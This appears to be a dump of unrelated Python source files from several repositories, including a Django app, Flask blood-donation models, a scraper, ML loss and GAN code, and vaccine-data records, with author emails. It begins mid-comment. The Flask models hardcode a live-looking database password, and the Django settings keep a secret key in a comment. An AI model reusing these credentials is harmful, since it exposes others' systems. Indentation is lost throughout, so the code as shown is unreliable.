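# DISRPT corpus). A 4-field conll 2003 input line such as
#   However RB B-ADVP B-S
# is rewritten to the 10-field line
#   1  However  _  _  _  _  _  _  _  BeginSeg=Yes   (columns joined by tabs)
# i.e. a running index, the token, seven "_" placeholder columns, then the inverse-mapped label.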
author: morteza758@gmail.com
file: /gphnuvoHDANN2Fmca_24.py | repo: daniel-reich/turbo-robot | license: no_license
"""
Write a function that sorts **only the odd numbers** in a list in **ascending
order** , keeping the even numbers in their current place.
For example, if our input list is: `[5, 2, 6, 6, 1, 4, 9, 3]`:
[_, 2, 6, 6, _, 4, _, _] # Keep evens in place.
# Sort odds: [5, 1, 9, 3] => [1, 3, 5, 9]
[1, 2, 6, 6, 3, 4, 5, 9] # Final list.
### Examples
odd_sort([7, 5, 2, 3, 1]) ➞ [1, 3, 2, 5, 7]
odd_sort([3, 7, 0, 9, 3, 2, 4, 8]) ➞ [3, 3, 0, 7, 9, 2, 4, 8]
odd_sort([2, 2, 8, 4]) ➞ [2, 2, 8, 4]
odd_sort([7, 9, 7]) ➞ [7, 7, 9]
### Notes
Lists may contain duplicate numbers.
"""
def odd_sort(lst):
odds = [i for i in lst if i%2==1]
odds.sort()
for i in range (len(lst)):
if lst[i]%2==1:
lst[i] = odds[0]
odds.pop(0)
return lst
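# Quick self-check against the docstring examples above (illustrative only, not part of
# the original submission):
#   odd_sort([5, 2, 6, 6, 1, 4, 9, 3])  ->  [1, 2, 6, 6, 3, 4, 5, 9]
#   odd_sort([7, 9, 7])                 ->  [7, 7, 9]
# The evens keep their positions; only the odd slots are refilled in ascending order.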
author: daniel.reich@danielreichs-MacBook-Pro.local
file: /mob/wsgi.py | repo: rcmiskin10/django-react-boilerplate | license: no_license
"""
WSGI config for mobsteer project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/2.0/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "mob.settings")
application = get_wsgi_application()
author: rcmiskin@Rickys-MBP.home
file: /爬虫1905/day07/08_jdspider.py | repo: klaus2015/py_base | license: no_license
from selenium import webdriver
import time
class JdSpider(object):
def __init__(self):
self.url = 'https://www.jd.com/'
        # create the browser object
        self.browser = webdriver.Chrome()
    # open the product search results for the "爬虫书" (web-scraping book) query
    def get_html(self):
        # locate the nodes, then use send_keys() and click()
so = '//*[@id="key"]'
button = '//*[@id="search"]/div/div[2]/button'
self.browser.get(self.url)
self.browser.find_element_by_xpath(so).send_keys('爬虫书')
self.browser.find_element_by_xpath(button).click()
        # required: give the page time to load
        time.sleep(3)
    # collect the list of li nodes holding each product's info, then parse li.text
def parse_html(self):
li_list = self.browser.find_elements_by_xpath('//*[@id="J_goodsList"]/ul/li')
for li in li_list:
L = li.text.split('\n')
if L[0].startswith('¥'):
price = L[0]
market = L[3]
elif L[0] == '单件':
price = L[3]
market = L[6]
elif '减' in L[0]:
price = L[1]
market = L[4]
print(price,market)
if __name__ == '__main__':
spider = JdSpider()
spider.get_html()
spider.parse_html()
author: 598467866@qq.com
file: /output/instances/nistData/atomic/gYear/Schema+Instance/NISTXML-SV-IV-atomic-gYear-minExclusive-1-3.py | repo: tefra/xsdata-w3c-tests | license: MIT
from output.models.nist_data.atomic.g_year.schema_instance.nistschema_sv_iv_atomic_g_year_min_exclusive_1_xsd.nistschema_sv_iv_atomic_g_year_min_exclusive_1 import NistschemaSvIvAtomicGYearMinExclusive1
from xsdata.models.datatype import XmlPeriod
obj = NistschemaSvIvAtomicGYearMinExclusive1(
value=XmlPeriod("2019")
)
author: tsoulloftas@gmail.com
file: /models.py | repo: Basma1412L/Blood_Donation_System | license: no_license
import os
from sqlalchemy import Column, String, Integer, create_engine
from flask_sqlalchemy import SQLAlchemy
import json
from flask_migrate import Migrate
DB_HOST = os.getenv('DB_HOST', '127.0.0.1:5432')
DB_USER = os.getenv('DB_USER', '')
DB_PASSWORD = os.getenv('DB_PASSWORD', '')
DB_NAME = os.getenv('DB_NAME', 'blood_donation_system')
database_path = ('postgres://atyqejusvixadd:'
                 '9aeeb8c28abcc0c4f5be39e6f93fea50f3e962'
                 'f44b73ecfa6450260acb63289e@ec2-54-85-13-135.compute-1'
                 '.amazonaws.com:5432/dclm7h9kc6hijf')
db = SQLAlchemy()
'''
setup_db(app)
binds a flask application and a SQLAlchemy service
'''
def setup_db(app, database_path=database_path):
app.config["SQLALCHEMY_DATABASE_URI"] = database_path
app.config["SQLALCHEMY_TRACK_MODIFICATIONS"] = False
db.app = app
db.init_app(app)
migrate = Migrate(app, db)
# db.create_all()
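# Hedged usage sketch (not part of the original module; the names and values below are
# illustrative only). A Flask app would typically be wired up like:
#   from flask import Flask
#   app = Flask(__name__)
#   setup_db(app)   # binds SQLAlchemy and Flask-Migrate to the app
#   Donor("Jane", 30, "F", "Some address", "0123456789",
#         "jane@example.com", "O+").insert()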
'''
Donor
'''
class Donor(db.Model):
id = Column(Integer, primary_key=True)
name = Column(String)
age = Column(Integer)
gender = Column(String)
address = Column(String)
phone = Column(String)
email = Column(String)
blood_type = Column(String)
donation = db.relationship(
'Donation', backref=db.backref(
'donor', cascade='all, delete'))
def __init__(self, name, age, gender, address, phone, email, blood_type):
self.name = name
self.age = age
self.gender = gender
self.address = address
self.phone = phone
self.email = email
self.blood_type = blood_type
def insert(self):
db.session.add(self)
db.session.commit()
def update(self):
db.session.commit()
def delete(self):
db.session.delete(self)
db.session.commit()
def format(self):
return {
'id': self.id,
'name': self.name,
'age': self.age,
'gender': self.gender,
'address': self.address,
'phone': self.phone,
'email': self.email,
'blood_type': self.blood_type
}
'''
Donation
'''
class Donation(db.Model):
id = Column(Integer, primary_key=True)
blood_type = db.Column(db.String)
time = db.Column(db.DateTime())
donor_id = db.Column(db.Integer, db.ForeignKey('donor.id'))
donationCenter_id = db.Column(
db.Integer, db.ForeignKey('donation_center.id'))
def __init__(self, donor_id, blood_type, time, donationCenter_id):
self.donor_id = donor_id
self.blood_type = blood_type
self.time = time
self.donationCenter_id = donationCenter_id
def insert(self):
db.session.add(self)
db.session.commit()
def update(self):
db.session.commit()
def delete(self):
db.session.delete(self)
db.session.commit()
def format(self):
return {
'id': self.id,
'donor_id': self.donor_id,
'blood_type': self.blood_type,
'donationCenter_id': self.donationCenter_id,
'time': self.time
}
'''
Donation Center
'''
class DonationCenter(db.Model):
id = Column(Integer, primary_key=True)
name = db.Column(db.String)
address = db.Column(db.String)
donations = db.relationship(
'Donation',
backref=db.backref(
'donation_center',
cascade='all, delete'))
appointments = db.relationship(
'Appointment', backref=db.backref(
'donation_center', cascade='all, delete'))
def __init__(self, name, address):
        self.name = name
self.address = address
def insert(self):
db.session.add(self)
db.session.commit()
def update(self):
db.session.commit()
def delete(self):
db.session.delete(self)
db.session.commit()
def format(self):
return {
'id': self.id,
'name': self.name,
'address': self.address
}
'''
Appointment
'''
class Appointment(db.Model):
id = Column(Integer, primary_key=True)
donations_center = db.Column(
db.Integer, db.ForeignKey('donation_center.id'))
time = db.Column(db.DateTime())
donors_limit = db.Column(db.Integer)
availibility = db.Column(db.Boolean, default=True)
def __init__(self, donations_center, time, donors_limit, availibility):
self.donations_center = donations_center
self.time = time
self.donors_limit = donors_limit
self.availibility = availibility
def insert(self):
db.session.add(self)
db.session.commit()
def update(self):
db.session.commit()
def delete(self):
db.session.delete(self)
db.session.commit()
def format(self):
return {
'id': self.id,
'donations_center': self.donations_center,
'time': self.time
}
class AppointmentsDonors(db.Model):
id = db.Column(db.Integer, primary_key=True)
donor_id = db.Column(db.Integer, db.ForeignKey('donor.id'))
appointment_id = db.Column(db.Integer, db.ForeignKey('appointment.id'))
donor = db.relationship(
Donor,
backref=db.backref(
'appointments_donors',
cascade='all, delete'))
appointment = db.relationship(
Appointment,
backref=db.backref(
'appointments_donors',
cascade='all, delete'))
def __init__(self, donor_id, appointment_id):
self.donor_id = donor_id
self.appointment_id = appointment_id
def insert(self):
db.session.add(self)
db.session.commit()
def update(self):
db.session.commit()
def delete(self):
db.session.delete(self)
db.session.commit()
def format(self):
return {
'id': self.id,
'appointment_id': self.appointment_id,
'donor_id': self.donor_id
}
author: basmammahdy@gmail.com
file: /mmdet/models/losses/pfocal_loss.py | repo: ruiningTang/mmdetection | license: Apache-2.0
import torch
import torch.nn as nn
import torch.nn.functional as F
from mmcv.ops import sigmoid_focal_loss as _sigmoid_focal_loss
from ..builder import LOSSES
from .utils import weight_reduce_loss
# This method is only for debugging
def py_sigmoid_focal_loss(pred,
target,
weight=None,
gamma=2.0,
alpha=0.25,
reduction='mean',
avg_factor=None):
"""PyTorch version of `Focal Loss <https://arxiv.org/abs/1708.02002>`_.
Args:
pred (torch.Tensor): The prediction with shape (N, C), C is the
number of classes
target (torch.Tensor): The learning label of the prediction.
weight (torch.Tensor, optional): Sample-wise loss weight.
gamma (float, optional): The gamma for calculating the modulating
factor. Defaults to 2.0.
alpha (float, optional): A balanced form for Focal Loss.
Defaults to 0.25.
reduction (str, optional): The method used to reduce the loss into
a scalar. Defaults to 'mean'.
avg_factor (int, optional): Average factor that is used to average
the loss. Defaults to None.
"""
pred_sigmoid = pred.sigmoid()
target = target.type_as(pred)
pt = (1 - pred_sigmoid) * target + pred_sigmoid * (1 - target)
focal_weight = (alpha * target + (1 - alpha) *
(1 - target)) * pt.pow(gamma)
loss = F.binary_cross_entropy_with_logits(
pred, target, reduction='none') * focal_weight
loss = weight_reduce_loss(loss, weight, reduction, avg_factor)
return loss
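# A tiny worked example of the modulating factor above (illustrative numbers, not taken
# from the paper or this repo): for a positive target with predicted probability
# p = sigmoid(pred) = 0.9, the factor pt ** gamma with pt = 1 - p = 0.1 and gamma = 2 is
# 0.1 ** 2 = 0.01, so this easy example contributes ~100x less to the loss than plain
# cross-entropy, while a hard example with p = 0.1 keeps a factor of 0.9 ** 2 = 0.81.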
def sigmoid_focal_loss(pred,
target,
weight=None,
gamma=2.0,
alpha=0.25,
reduction='mean',
avg_factor=None):
r"""A warpper of cuda version `Focal Loss
<https://arxiv.org/abs/1708.02002>`_.
Args:
pred (torch.Tensor): The prediction with shape (N, C), C is the number
of classes.
target (torch.Tensor): The learning label of the prediction.
weight (torch.Tensor, optional): Sample-wise loss weight.
gamma (float, optional): The gamma for calculating the modulating
factor. Defaults to 2.0.
alpha (float, optional): A balanced form for Focal Loss.
Defaults to 0.25.
reduction (str, optional): The method used to reduce the loss into
a scalar. Defaults to 'mean'. Options are "none", "mean" and "sum".
avg_factor (int, optional): Average factor that is used to average
the loss. Defaults to None.
"""
# Function.apply does not accept keyword arguments, so the decorator
# "weighted_loss" is not applicable
loss = _sigmoid_focal_loss(pred.contiguous(), target, gamma, alpha, None,
'none')
if weight is not None:
if weight.shape != loss.shape:
if weight.size(0) == loss.size(0):
# For most cases, weight is of shape (num_priors, ),
# which means it does not have the second axis num_class
weight = weight.view(-1, 1)
else:
# Sometimes, weight per anchor per class is also needed. e.g.
# in FSAF. But it may be flattened of shape
# (num_priors x num_class, ), while loss is still of shape
# (num_priors, num_class).
assert weight.numel() == loss.numel()
weight = weight.view(loss.size(0), -1)
assert weight.ndim == loss.ndim
loss = weight_reduce_loss(loss, weight, reduction, avg_factor)
return loss
@LOSSES.register_module()
class ProgressiveFocalLoss(nn.Module):
def __init__(self,
use_sigmoid=True,
gamma=2.0,
delta=0.5,
w=0.5,
reduction='mean',
loss_weight=1.0):
"""`Focal Loss <https://arxiv.org/abs/1708.02002>`_
Args:
use_sigmoid (bool, optional): Whether to the prediction is
used for sigmoid or softmax. Defaults to True.
gamma (float, optional): The gamma for calculating the modulating
factor. Defaults to 2.0.
            delta (float, optional): Half-width of the interval to which the
                per-level gamma is clamped. Defaults to 0.5.
            w (float, optional): Constant used to derive alpha as w / gamma.
                Defaults to 0.5.
reduction (str, optional): The method used to reduce the loss into
a scalar. Defaults to 'mean'. Options are "none", "mean" and
"sum".
loss_weight (float, optional): Weight of loss. Defaults to 1.0.
"""
super(ProgressiveFocalLoss, self).__init__()
assert use_sigmoid is True, 'Only sigmoid focal loss supported now.'
self.use_sigmoid = use_sigmoid
self.delta = delta
self.w = w
self.gamma = gamma
self.reduction = reduction
self.loss_weight = loss_weight
def forward(self,
pred,
target,
weight=None,
avg_factor=None,
reduction_override=None,
lvl_gamma=None):
"""Forward function.
Args:
pred (torch.Tensor): The prediction.
target (torch.Tensor): The learning label of the prediction.
weight (torch.Tensor, optional): The weight of loss for each
prediction. Defaults to None.
avg_factor (int, optional): Average factor that is used to average
the loss. Defaults to None.
reduction_override (str, optional): The reduction method used to
override the original reduction method of the loss.
Options are "none", "mean" and "sum".
Returns:
torch.Tensor: The calculated loss
"""
assert reduction_override in (None, 'none', 'mean', 'sum')
reduction = (
reduction_override if reduction_override else self.reduction)
gamma = lvl_gamma.clamp_(min=self.gamma-self.delta, max=self.gamma+self.delta)
alpha = self.w / gamma
if self.use_sigmoid:
loss_cls = self.loss_weight * sigmoid_focal_loss(
pred,
target,
weight,
gamma=gamma.cpu().numpy().tolist(),
alpha=alpha.cpu().numpy().tolist(),
reduction=reduction,
avg_factor=avg_factor)
else:
raise NotImplementedError
return loss_cls
author: tangruining@zju.edu.cn
file: /Celvapan_WC500022670.py | repo: urudaro/data-ue | license: no_license
{'_data': [['Uncommon',
[['Psychiatric',
u'(>1/1 000, < 1/100), s\xe4llsynta (>1/10 000, < 1/1 000), mycket s\xe4llsynta (< 1/10 000)'],
['Psychiatric',
u'(\u22651/1 000, < 1/100), s\xe4llsynta (\u22651/10 000, < 1/1 000), mycket s\xe4llsynta (< 1/10 000) \uf0b7Kliniska pr\xf6vningar med en version av Celvapan inneh\xe5llande en H5N1-vaccinstam Kliniska pr\xf6vningar utf\xf6rdes med en version av Celvapan inneh\xe5llande en H5N1-vaccinstam (se avsnitt 5.1) hos cirka 3 700 personer (i \xe5ldrarna 18 till 60 \xe5r och \xf6ver), och i grupper med s\xe4rskild risk p\xe5 cirka 300 personer var best\xe5ende av personer med nedsatt immunf\xf6rsvar och patienter med kroniska sjukdomstillst\xe5nd. De flesta av reaktionerna var lindriga till sin art, kortvariga och kvalitativt likartade dem som framkallas av influensavacciner. Det f\xf6rekom f\xe4rre reaktioner efter den andra dosen j\xe4mf\xf6rt med den f\xf6rsta dosen. S\xe4kerhetsprofilen f\xf6r friska personer > 60 \xe5rs \xe5lder, personer med nedsatt immunf\xf6rsvar och patienter med kroniska sjukdomstillst\xe5nd liknar s\xe4kerhetsprofilen f\xf6r friska f\xf6rs\xf6kspersoner. \uf0b7Uppf\xf6ljning efter marknadsintroduktion']]],
['Unknown',
[['Psychiatric',
u'CENTRALA OCH PERIFERA Huvudv\xe4rk Mycket vanliga NERVSYSTEMET Yrsel Vanliga \xd6GON \xd6gonirritation Vanliga ANDNINGSV\xc4GAR, BR\xd6STKORG Faryngolaryngeal sm\xe4rta Vanliga OCH MEDIASTINUM MAGTARMKANALEN Buksm\xe4rta Vanliga HUD OCH SUBKUTAN V\xc4VNAD Hyperhidros Vanliga Utslag Vanliga N\xe4sselutslag Vanliga MUSKULOSKELETALA SYSTEMET Artralgi Vanliga OCH BINDV\xc4V Myalgi Vanliga ALLM\xc4NNA SYMTOM OCH/ELLER Utmattning Mycket vanliga SYMTOM VID Pyrexi Vanliga ADMINISTRERINGSST\xc4LLET Frossa Vanliga Sjukdomsk\xe4nsla Vanliga Reaktioner p\xe5 injektionsst\xe4llet Vanliga \uf0b7Sm\xe4rta p\xe5 injektionsst\xe4llet Vanliga \uf0b7F\xf6rh\xe5rdnad p\xe5 injektionsst\xe4llet Vanliga \uf0b7Erytem p\xe5 injektionsst\xe4llet Vanliga \uf0b7Svullnad av injektionsst\xe4llet Vanliga F\xf6rs\xe4mrad r\xf6relsef\xf6rm\xe5ga p\xe5 \uf0b7 Vanliga injektionsst\xe4llet Biverkningsfrekvens \xe4r baserad p\xe5 f\xf6ljande skala: Mycket vanliga (\u22651/10); vanliga (\u22651/100, < 1/10),'],
['Psychiatric',
u'Rastl\xf6shet -Vanliga CENTRALA OCH PERIFERA Huvudv\xe4rk Vanliga Vanliga Vanliga NERVSYSTEMET Gr\xe5t --Vanliga S\xf6mnighet --Vanliga \xd6RON OCH BALANSORGAN Yrsel Vanliga ANDNINGSV\xc4GAR, Hosta - -Vanliga BR\xd6STKORG OCH MEDIASTINUM MAGTARMKANALEN Buksm\xe4rta Vanliga -Vanliga Illam\xe5ende Vanliga -Vanliga Uppkastning Vanliga Vanliga Vanliga Diarr\xe9 -Vanliga Vanliga HUD OCH SUBKUTAN Hyperhidros --Vanliga V\xc4VNAD Utslag --Vanliga MUSKULOSKELETALA Myalgi Vanliga SYSTEMET OCH BINDV\xc4V Sm\xe4rta i extremiteter Vanliga ALLM\xc4NNA SYMTOM Utmattning -Vanliga OCH/ELLER SYMTOM VID Pyrexi -Vanliga Mycket vanliga ADMINISTRERINGSST\xc4LLET Frossa Vanliga Vanliga Vanliga Retlighet --Vanliga Sjukdomsk\xe4nsla --Vanliga Reaktioner p\xe5 injektionsst\xe4llet \uf0b7Sm\xe4rta p\xe5 Mycket Vanliga Vanliga injektionsst\xe4llet vanliga \uf0b7F\xf6rh\xe5rdnad p\xe5 Vanliga Vanliga Vanliga injektionsst\xe4llet \uf0b7Erytem p\xe5 Vanliga Vanliga Vanliga injektionsst\xe4llet \uf0b7Svullnad av Vanliga Vanliga Vanliga injektionsst\xe4llet Biverkningsfrekvens \xe4r baserad p\xe5 f\xf6ljande skala: Mycket vanliga (\u22651/10); vanliga (\u22651/100, < 1/10),'],
['Immune system', u'Anafylaktisk reaktion*, \xf6verk\xe4nslighet*'],
['Nervous system', u'Feberkramp Hypestesi'],
['Skin',
u'Angio\xf6dem *S\xe5dana reaktioner har manifesterats som andn\xf6d, hypotoni, takykardi, takypn\xe9, cyanos, pyrexi, vallningar, angio\xf6dem och urtikaria'],
['Musculoskeletal',
u'Sm\xe4rta i extremitet (i de flesta fall rapporterade som sm\xe4rta i den injicerade armen)'],
['General',
u'Influensaliknande sjukdom Trivalenta s\xe4songsbundna influensavacciner I uppf\xf6ljning efter marknadsintroduktion med \xe4ggderiverade trivalenta s\xe4songsbundna influensavacciner har f\xf6ljande allvarliga biverkningar rapporterats']]]],
'_pages': [4, 8],
u'_rank': 9,
u'_type': u'LSFU'}
author: urudaro@gmail.com
file: /A Byte of Python/pickling.py | repo: peter-chen-meihua/python | license: no_license
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Filename: pickling.py
import pickle as p
# import pickle as p
shoplistfile = 'shoplist.data'
# the name of the file where we will store the object
shoplist = ['apple','mango','carrot']
# Write to the file
f = open(shoplistfile,'wb')
p.dump(shoplist,f) # dump the object to a file
f.close()
del shoplist # remove the shoplist
# Read back from the storage
f = open(shoplistfile,'rb') # open in binary mode to match the 'wb' dump above
storedlist = p.load(f)
print(storedlist)
author: peter.chen@meihua.info
file: /Recogniser.py | repo: aryan2511/Face-Recognition-Attendance-System- | license: no_license
import cv2
import numpy as np;
import xlwrite
#import firebase.firebase_ini as fire;
import time
import sys
from playsound import playsound
start = time.time()
period = 8
face_cas = cv2.CascadeClassifier('haarcascade_frontalface_default.xml')
cap = cv2.VideoCapture(0);
recognizer = cv2.face.LBPHFaceRecognizer_create();
recognizer.read(r'G:\Projects\MiniProj_\Trainer.yml')  # raw string keeps the backslashes literal
flag = 0;
id = 0;
filename = 'filename';
dict = {'item1': 1}
font = cv2.FONT_HERSHEY_SIMPLEX
while True:
ret, img = cap.read();
gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY);
faces = face_cas.detectMultiScale(gray, 1.3, 7);
for (x, y, w, h) in faces:
roi_gray = gray[y:y + h, x:x + w]
cv2.rectangle(img, (x, y), (x + w, y + h), (255, 0, 0), 2);
id, conf = recognizer.predict(roi_gray)
if (conf < 50):
if (id == 1):
id = 'Aryan Bose'
if ((str(id)) not in dict):
filename = xlwrite.output('attendance', 'class1', 1, id, 'yes');
dict[str(id)] = str(id);
elif (id == 2):
id = 'Abhiraj Daddi'
if ((str(id)) not in dict):
filename = xlwrite.output('attendance', 'class1', 2, id, 'yes');
dict[str(id)] = str(id);
elif (id == 3):
id = 'Kaushal'
if ((str(id)) not in dict):
filename = xlwrite.output('attendance', 'class1', 3, id, 'yes');
dict[str(id)] = str(id);
elif (id == 4):
id = 'Sonali Bose'
if ((str(id)) not in dict):
filename = xlwrite.output('attendance', 'class1', 4, id, 'yes');
dict[str(id)] = str(id);
else:
id = 'Unknown, can not recognize'
flag = flag + 1
break
cv2.putText(img, str(id) + " " + str(conf), (x, y - 10), font, 0.55, (120, 255, 120), 1)
# cv2.cv.PutText(cv2.cv.fromarray(img),str(id),(x,y+h),font,(0,0,255));
cv2.imshow('frame', img);
# cv2.imshow('gray',gray);
if flag == 10:
playsound('transactionSound.mp3')
print("Transaction Blocked")
break;
if time.time() > start + period:
break;
if cv2.waitKey(100) & 0xFF == ord('q'):
break;
cap.release();
cv2.destroyAllWindows();
author: aryan2511.noreply@github.com
file: /web3sr/settings.py | repo: roubin/web3sr | license: no_license
"""
Django settings for web3sr project.
Generated by 'django-admin startproject' using Django 2.0.7.
For more information on this file, see
https://docs.djangoproject.com/en/2.0/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/2.0/ref/settings/
"""
import os
import dj_database_url
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
PROJECT_ROOT = os.path.dirname(os.path.abspath(__file__))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/2.0/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = os.environ['SECRET_KEY'] # 3j*whbe7_=abwo*^ug+8_yu-&j7yye2)$1=&45ih@)%@l9wnty
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = False
ALLOWED_HOSTS = ["127.0.0.1", "web3sr.herokuapp.com"]
# Application definition
INSTALLED_APPS = [
'publi.apps.PubliConfig',
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'web3sr.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [os.path.join(BASE_DIR, 'templates')],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'web3sr.wsgi.application'
# Database
# https://docs.djangoproject.com/en/2.0/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Password validation
# https://docs.djangoproject.com/en/2.0/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/2.0/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
SECURE_PROXY_SSL_HEADER = ('HTTP_X_FORWARDED_PROTO', 'https')
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/2.0/howto/static-files/
STATIC_URL = '/static/'
# where to collect
STATICFILES_DIRS = (os.path.join(PROJECT_ROOT, 'static'), )
# where to look for
STATIC_ROOT = os.path.join(PROJECT_ROOT, 'staticfiles')
# database for heroku
db_from_env = dj_database_url.config(conn_max_age=500)
DATABASES['default'].update(db_from_env)
# STATICFILES_STORAGE = 'whitenoise.storage.CompressedManifestStaticFilesStorage'
author: emmanuel.roubin@univ-grenoble-alpes.fr
file: /webapp/apps/posts/urls.py | repo: jpennell/jamespennell.com | license: no_license
#Django
from django.conf.urls import patterns, url
urlpatterns = patterns('webapp.apps.posts.views',
url(r'^$', 'list', name='blog'),
url(r'^(?P<page_id>\d+)/$', 'list', name="post-list"),
url(r'^posts/(?P<post_id>\d+)/$', 'detail', name="post-detail"),
)
author: pennell.james@gmail.com
file: /List/processing.py | repo: RegCookies/Offer-Sward | license: no_license
def process(t,n):
if t == None or n <= 0:
return None
m = len(t)
proTime = [0]* m
i = 0
while i < n:
minTime = proTime[0] + t[0]
minIndex = 0
j = 1
while j < m:
if minTime > proTime[j] + t[j]:
minTime = proTime[j] + t[j]
minIndex = j
j +=1
        proTime[minIndex] += t[minIndex]
        i += 1  # advance to the next task so the while loop terminates
return proTime
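# Worked example (hedged: derived by hand from the greedy rule above, which always hands
# the next task to the server that would finish it earliest). With per-task times
# t = [7, 10] and n = 6 tasks, the loop assigns 4 tasks to the first server and 2 to the
# second, so process([7, 10], 6) returns [28, 20] and the makespan is max(proTime) == 28.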
if __name__ == "__main__":
t = [7,10]
n = 6
protime = process(t,n)
if protime == None:
print("ERROR")
else:
totalTime = protime[0]
i = 0
while i <len(protime):
print("第" + str(i+1) + "台服务器有" + str(protime[i]/t[i]) + "总执行时间"+ str(protime[i]))
if protime[i] > totalTime:
totalTime = protime[i]
i+=1
print(str(totalTime))
author: RegCookies.noreply@github.com
file: /model/gen_discr.py | repo: rosasha/GAN_PROJECT_Pix2Pix | license: no_license
#!/usr/bin/env python
# coding: utf-8
# In[1]:
import torch
import torch.nn as nn
# In[2]:
class CBlock(nn.Module):
def __init__(self, in_channels, out_channels, kernel_size=4, stride=2, padding=1, act=True, batch_norm=True):
super(CBlock, self).__init__()
self.conv = nn.Conv2d(in_channels, out_channels, kernel_size, stride, padding)
self.activation = act
self.lrelu = nn.LeakyReLU(0.2)
self.batch_norm = batch_norm
self.bn = nn.BatchNorm2d(out_channels)
def forward(self, x):
if self.activation:
out = self.conv(self.lrelu(x))
else:
out = self.conv(x)
if self.batch_norm:
return self.bn(out)
else:
return out
# In[3]:
class DBlock(nn.Module):
def __init__(self, in_channels, out_channels, kernel_size=4, stride=2, padding=1, batch_norm=True, dropout=False):
super(DBlock, self).__init__()
self.deconv = nn.ConvTranspose2d(in_channels, out_channels, kernel_size, stride, padding)
self.bn = nn.BatchNorm2d(out_channels)
self.drop = nn.Dropout(0.5)
self.relu = nn.ReLU(True)
self.batch_norm = batch_norm
self.dropout = dropout
def forward(self, x):
if self.batch_norm:
out = self.bn(self.deconv(self.relu(x)))
else:
out = self.deconv(self.relu(x))
if self.dropout:
return self.drop(out)
else:
return out
# In[17]:
class Generator(torch.nn.Module):
def __init__(self, in_channels=3, features=64,):
super(Generator, self).__init__()
# Encoder
self.conv1 = CBlock(in_channels, features, batch_norm=False)
self.conv2 = CBlock(features, features * 2)
self.conv3 = CBlock(features * 2, features * 4)
self.conv4 = CBlock(features * 4, features * 8)
self.conv5 = CBlock(features * 8, features * 8)
self.conv6 = CBlock(features * 8, features * 8)
self.conv7 = CBlock(features * 8, features * 8)
self.bottleneck = CBlock(features * 8, features * 8, batch_norm=False)
# Decoder
self.deconv1 = DBlock(features * 8, features * 8, dropout=True)
self.deconv2 = DBlock(features * 8 * 2, features * 8, dropout=True)
self.deconv3 = DBlock(features * 8 * 2, features * 8, dropout=True)
self.deconv4 = DBlock(features * 8 * 2, features * 8)
self.deconv5 = DBlock(features * 8 * 2, features * 4)
self.deconv6 = DBlock(features * 4 * 2, features * 2)
self.deconv7 = DBlock(features * 2 * 2, features)
self.final_up = DBlock(features * 2, in_channels, batch_norm=False)
def forward(self, x):
# Encoder
d1 = self.conv1(x)
d2 = self.conv2(d1)
d3 = self.conv3(d2)
d4 = self.conv4(d3)
d5 = self.conv5(d4)
d6 = self.conv6(d5)
d7 = self.conv7(d6)
bottleneck = self.bottleneck(d7)
# Decoder
up1 = self.deconv1(bottleneck)
up2 = self.deconv2(torch.cat([up1, d7], 1))
up3 = self.deconv3(torch.cat([up2, d6], 1))
up4 = self.deconv4(torch.cat([up3, d5], 1))
up5 = self.deconv5(torch.cat([up4, d4], 1))
up6 = self.deconv6(torch.cat([up5, d3], 1))
up7 = self.deconv7(torch.cat([up6, d2], 1))
out = self.final_up(torch.cat([up7, d1], 1))
out = nn.Tanh()(out)
return out
# In[24]:
class Discriminator(nn.Module):
def __init__(self, in_channels=3, out_channels=1, features=64):
super(Discriminator, self).__init__()
self.conv1 = CBlock(in_channels*2, features, act=False, batch_norm=False)
self.conv2 = CBlock(features, features * 2)
self.conv3 = CBlock(features * 2, features * 4)
self.conv4 = CBlock(features * 4, features * 8, stride=1)
self.conv5 = CBlock(features * 8, out_channels, stride=1, batch_norm=False)
def forward(self, x, label):
x = torch.cat([x, label], 1)
x = self.conv1(x)
x = self.conv2(x)
x = self.conv3(x)
x = self.conv4(x)
x = self.conv5(x)
out = nn.Sigmoid()(x)
return out
# In[30]:
def test1():
x = torch.randn((1, 3, 256, 256))
model1 = Generator(in_channels=3, features=64)
preds1 = model1(x)
print(model1)
print(preds1.shape)
def test2():
x = torch.randn((1, 3, 256, 256))
y = torch.randn((1, 3, 256, 256))
model2 = Discriminator(in_channels=3, out_channels=1, features=64)
preds2 = model2(x, y)
print(model2)
